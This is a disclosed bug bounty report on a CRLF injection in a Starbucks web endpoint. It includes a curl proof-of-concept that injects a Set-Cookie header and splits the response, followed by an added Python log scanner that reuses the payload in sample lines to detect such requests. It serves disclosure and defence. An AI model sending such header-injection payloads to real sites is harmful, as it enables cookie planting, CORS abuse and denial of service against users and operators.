CRLF injection on www.starbucks.com

Disclosed: 2020-09-01 21:59:31 By x3n0nn3p To starbucks
Medium
Vulnerability Details
The vulnerability allows setting arbitrary headers, and also enables response splitting which can then be exploited further.

POC:

```
curl -i 'https://www.starbucks.com/email-prospecttg9wh%0d%0aset-cookie:foo%0d%0a%0d%0a4t6uf?requesturl=/responsibility/global-report/policies' -d 'newsletter_signup_email=&newsletter_signup_zipcode=&newsletter_placement=footer' --http1.1
```

Screenshot Attached.

Regards

## Impact

Possible impacts include:

- Stealing authenticated information via Ajax request with injected CORS headers
- Application DOS using overly long Cookies, etc.
Report Stats
  • Report ID: 858650
  • State: Closed
  • Substate: resolved
  • Upvotes: 32
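
For triage of this class of issue, the following added example (not part of the original report) scans access-log lines for request targets that carry encoded CR/LF, as the POC path above does, and lists the header names placed after the line break. The log layout, the sample lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line as it appears inside a combined-style access log entry (assumed layout).
REQUEST_LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
HEADER_LIKE = re.compile(r'^([A-Za-z0-9-]+):')

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded CR/LF (%250d%250a) is exposed too."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_crlf_injection(log_line):
    """Return a finding dict if the request target decodes to CR or LF, else None."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return None
    decoded = decode_fully(m.group("target"))
    if "\r" not in decoded and "\n" not in decoded:
        return None
    # Treat CRLF, bare CR and bare LF alike: servers and proxies differ in what they accept.
    lines = decoded.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    headers = []
    for line in lines[1:]:
        if line == "":          # blank line ends the header block
            break
        h = HEADER_LIKE.match(line)
        if h:
            headers.append(h.group(1).lower())
    return {
        "target": m.group("target"),
        "headers": headers,                       # header names the request tried to add
        "splits_response": "" in lines[1:-1],     # blank line followed by more data
    }

# Constructed sample log lines; the first reuses the path from the report's POC.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:00:00:00 +0000] "POST /email-prospecttg9wh%0d%0aset-cookie:foo%0d%0a%0d%0a4t6uf?requesturl=/responsibility/global-report/policies HTTP/1.1" 200 512',
    '203.0.113.8 - - [01/Jan/2020:00:00:01 +0000] "GET /store-locator?place=Seattle%2C%20WA HTTP/1.1" 200 1024',
    '203.0.113.9 - - [01/Jan/2020:00:00:02 +0000] "GET /menu%250d%250ax-test:1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(find_crlf_injection(entry))
```

On the server side, the corresponding fix is to reject or strip CR and LF from any request-derived value before it is written into a response header.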